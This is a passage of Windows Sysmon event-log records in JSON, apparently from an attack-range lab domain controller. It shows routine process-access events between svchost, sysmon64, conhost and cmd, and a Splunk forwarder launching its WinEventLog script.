05:46:50.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2119,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2120,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2121,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2122,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2123,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2124,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2125,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.344\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C8-5F25-0000-001028D00300}\r\nTargetProcessId: 4064\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.344","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C8-5F25-0000-001028D00300}","TargetProcessId":"4064","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2126,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.472\r\nProcessGuid: {A837DB8D-01CA-5F25-0000-001032F30300}\r\nProcessId: 3956\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinEventLog.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.472","ProcessGuid":"{A837DB8D-01CA-5F25-0000-001032F30300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinEventLog.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
